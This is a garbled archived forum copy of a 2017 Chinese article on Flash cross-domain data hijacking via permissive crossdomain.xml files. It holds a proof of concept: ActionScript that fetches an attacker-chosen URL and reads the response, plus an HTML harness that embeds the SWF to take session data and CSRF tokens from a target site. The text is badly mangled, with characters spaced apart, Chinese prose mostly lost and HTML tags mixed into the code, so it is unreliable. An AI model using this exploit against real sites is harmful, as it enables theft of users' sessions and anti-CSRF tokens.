搜索

[20917] 2017-10-04_Flash跨域数据劫持漏洞

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2017-10-04_Flash跨域数据劫持漏洞 F l a s h L e m o n S e c   2 0 1 7 - 1 0 - 0 4 f l a s h c r o s s d o m a i n . x m l f l a s h   c s r f c r o s s d o m a i n . x m l 1 p e r m i t t e d - c r o s s - d o m a i n - p o l i c i e s a l l   J P G [ 使 x x ] 2 a l l o w - a c c e s s - f r o m   * f l a s h 3 a l l o w - h t t p - r e q u e s t - h e a d e r s - f r o m   h e a d e r * 0 × 0 1 C o n t e n t - T y p e o b j e c t f l a s h f l a s h o b j e c t A c t i o n S c r i p t A P I F l a s h F l a s h 访 S e s s i o n C S R F   T o k e n 0 × 0 2 C o n t e n t - D i s p o s i t i o n 访 s e s s i o n 0 × 0 3 p o c   s w f h t t p G E T 1 .   < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . n e t . U R L L o a d e r ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . n e t . U R L R e q u e s t ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . n e t . U R L L o a d e r D a t a F o r m a t ; < / p > < p s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . n e t . U R L V a r i a b l e s ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . e v e n t s . E v e n t ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . e v e n t s . H T T P S t a t u s E v e n t ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . e v e n t s . I O E r r o r E v e n t ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . e v e n t s . P r o g r e s s E v e n t ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . e v e n t s . S e c u r i t y E r r o r E v e n t ; < / p > < p   s t y l e = " m a r g i n - b o t t o m : 1 0 p x ; " > i m p o r t f l a s h . d i s p l a y . L o a d e r I n f o ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i m p o r t f l a s h . s y s t e m . S e c u r i t y ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > S e c u r i t y . a l l o w D o m a i n ( " * " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > v a r u r l O b j : O b j e c t =   L o a d e r I n f o ( t h i s . r o o t . l o a d e r I n f o ) . p a r a m e t e r s . u r l ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > v a r r e q u e s t : U R L R e q u e s t   =   n e w   U R L R e q u e s t ( u r l O b j . t o S t r i n g ( ) ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > r e q u e s t . m e t h o d = U R L R e q u e s t M e t h o d . G E T ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >       < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > v a r l o a d e r : U R L L o a d e r   =   n e w   U R L L o a d e r ( ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i t e m S c r o l l . x = r e s p o n s e . x + r e s p o n s e . w i d t h ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i t e m S c r o l l . y =   r e s p o n s e . y ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > i t e m S c r o l l . h e i g h t =   r e s p o n s e . h e i g h t ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >       < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > l o a d e r . d a t a F o r m a t =   U R L L o a d e r D a t a F o r m a t . T E X T ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > l o a d e r . a d d E v e n t L i s t e n e r ( E v e n t . C O M P L E T E , l o a d e r _ c o m p l e t e ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m : 1 0 p x ; " > l o a d e r . l o a d ( r e q u e s t ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >       < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > f u n c t i o n l o a d e r _ c o m p l e t e   ( e : E v e n t ) : v o i d   { < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   t r a c e ( " E v e n t . C O M P L E T E " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   t r a c e ( " R e s p   D a t a   : n "   +   l o a d e r . d a t a ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   r e s p o n s e . t e x t   =   l o a d e r . d a t a ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   i t e m S c r o l l . s c r o l l T a r g e t   =   r e s p o n s e ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > } < / p > 使 L o a d e r I n f o ( t h i s . r o o t . l o a d e r I n f o ) o b j e c t f l a s h V a r s 访 U R L 使 U R L L o a d e r U R L G E T T e x t s w f < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < h t m l > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < h e a d > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < t i t l e > F l a s h C S R F   P O C   b y   p n i g 0 s @ F r e e B u f < / t i t l e > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < / h e a d > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < b o d y > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < h 2 > F l a s h C S R F   P O C   b y   p n i g 0 s @ F r e e B u f < / h 2 > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < d i v > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f   u r l < i n p u t t y p e = " t e x t "   i d = " s w f u r l "   s t y l e = " w i d t h : 5 0 0 " > < / b r > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > h i j a c k u r l < i n p u t   t y p e = " t e x t "   i d = " c s r f u r l " s t y l e = " w i d t h :   5 0 0 " > < / b r > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < i n p u t t y p e = " b u t t o n " v a l u e = " s u b m i t "   i d = " s u b m i t " > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < / d i v > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < i f r a m e n a m e = " s w f "   s t y l e = " w i d t h : 1 0 0 0 ; h e i g h t : 1 0 0 0 " > < / i f r a m e > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < s c r i p t > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > f u n c t i o n w r i t e f l a s h o b j e c t ( u r l , p a r a s t r )   { < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f   = w i n d o w . f r a m e s [ " s w f " ] ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < o b j e c t c l a s s i d = " c l s i d : d 2 7 c d b 6 e - a e 6 d - 1 1 c f - 9 6 b 8 - 4 4 4 5 5 3 5 4 0 0 0 0 " c o d e b a s e = " h t t p : / / f p d o w n l o a d . m a c r o m e d i a . c o m / p u b / s h o c k w a v e / c a b s / f l a s h / s w f l a s h . c a b # v e r s i o n = 7 , 0 , 0 , 0 " w i d t h = " 1 0 0 0 "   h e i g h t = " 1 0 0 0 " i d = " F l a s h V a r s " a l i g n = " m i d d l e " > n " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < p a r a m n a m e = " a l l o w S c r i p t A c c e s s "   v a l u e = " a l w a y s " / > n " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < p a r a m n a m e = " m o v i e "   v a l u e = " F l a s h V a r s . s w f "   / > n " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < p a r a m n a m e = " F l a s h V a r s "   v a l u e = " " +   p a r a s t r   + " " / > n " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m : 1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < p a r a m n a m e = " q u a l i t y "   v a l u e = " h i g h "   / > n " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < p a r a m n a m e = " b g c o l o r "   v a l u e = " # f f f f f f "   / > n " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m : 1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < e m b e d s r c = " " + u r l + " "   q u a l i t y = " h i g h " b g c o l o r = " # f f f f f f "   w i d t h = " 5 5 0 "   h e i g h t = " 4 0 0 " n a m e = " F l a s h V a r s "   a l i g n = " m i d d l e "   a l l o w S c r i p t A c c e s s = " a l w a y s " F l a s h V a r s = " " +   p a r a s t r   + " " t y p e = " a p p l i c a t i o n / x - s h o c k w a v e - f l a s h "   p l u g i n s p a g e = " h t t p : / / w w w . m a c r o m e d i a . c o m / g o / g e t f l a s h p l a y e r " / > " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s w f . d o c u m e n t . w r i t e ( " < / o b j e c t > " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > } < / p > < p   s t y l e = " m a r g i n - b o t t o m : 1 0 p x ; " > f u n c t i o n g e t   ( n a m e )   { < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                       v a r   q u e r y   = w i n d o w . l o c a t i o n . s e a r c h . s u b s t r i n g ( 1 ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                       v a r   p a i r s   = q u e r y . s p l i t ( " & " ) ; < / p > < p   s t y l e = " m a r g i n - < ? x m l v e r s i o n = " 1 . 0 " ? >     < c r o s s - d o m a i n - p o l i c y >   < s i t e - c o n t r o l p e r m i t t e d - c r o s s - d o m a i n - p o l i c i e s = " a l l " / >         < a l l o w - a c c e s s - f r o m d o m a i n = " * " / >         < a l l o w - h t t p - r e q u e s t - h e a d e r s - f r o m d o m a i n = " * " h e a d e r s = " * " / > < / c r o s s - d o m a i n - p o l i c y >
b o t t o m :   1 0 p x ; " >                                       f o r   ( v a r   i   =   0 ;   i < p a i r s . l e n g t h ;   i + + ) < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                       { < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                                         v a r   p o s = p a i r s [ i ] . i n d e x O f ( ' = ' ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                                         i f ( p o s   = = - 1 ) c o n t i n u e ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                                         v a r   a r g n a m e   = p a i r s [ i ] . s u b s t r i n g ( 0 , p o s ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                                         v a r   v a l u e = p a i r s [ i ] . s u b s t r i n g ( p o s + 1 ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                                         i f   ( a r g n a m e   = =   n a m e ) { r e t u r n   v a l u e ; } < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                                       } ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   } < / p > < p s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > v a r s u b m i t   =   d o c u m e n t . g e t E l e m e n t B y I d ( " s u b m i t " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > s u b m i t . a d d E v e n t L i s t e n e r ( " c l i c k " , f u n c t i o n ( )   { < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   v a r   s w f u r l = d o c u m e n t . g e t E l e m e n t B y I d ( " s w f u r l " ) . v a l u e ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   v a r   p a r a m = " u r l = " + d o c u m e n t . g e t E l e m e n t B y I d ( " c s r f u r l " ) . v a l u e ; / / " u r l = " + g e t ( " c s r f u r l " ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                 w r i t e f l a s h o b j e c t ( s w f u r l , p a r a m ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " >                   r e t u r n   f a l s e ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > } ) ; < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < / s c r i p t > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < / b o d y > < / p > < p   s t y l e = " m a r g i n - b o t t o m :   1 0 p x ; " > < / h t m l > < / p > 0 × 0 3 访 s w f j p g 访 s e s s i o n 访 C h r o m e D e v e l o p e r T o o l 访 1 .   h t t p : / / x x x . c o m / i n t f . p h p ? m e t h o d = P r e v i e w . o u t p u t P i c & x i d = 1 7 8 x x x 5 3 5 & f n a m e = % 2 F r e q . j p g & f h a s h = f 9 c e f d 7 e 9 0 0 x x x x x x 6 d 4 7 c d 5 9 0 9 7 9 6 e 1 b 9 & d t = 2 4 . 0 1 x x x x x x d 8 c 9 1 c 6 f e f a d 8 4 8 & v = 1 . 0 . 1 & r t i c k = 1 4 0 0 8 1 7 2 5 4 4 5 8 3 & o p e n _ a p p _ i d = 0 & d e v t y p e = w e b & s i g n = 8 8 9 5 b d 6 8 4 4 b x x x x x x 1 5 e 4 2 a 8 b & h t m l 使 o b j e c t s w f 访 A n t i - C S R F C S R F   T o k e n 访 0 × 0 4 U E d i t o r C K E d i t o r K i n d E d i t o r X h E d i t o r E w e b e d i t o r W e b 0 × 0 5 j p g 线 访 C o n t e n t - D i s p o s i t i o n U R L d o w n l o a d t y p e = 1 0 u r l
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理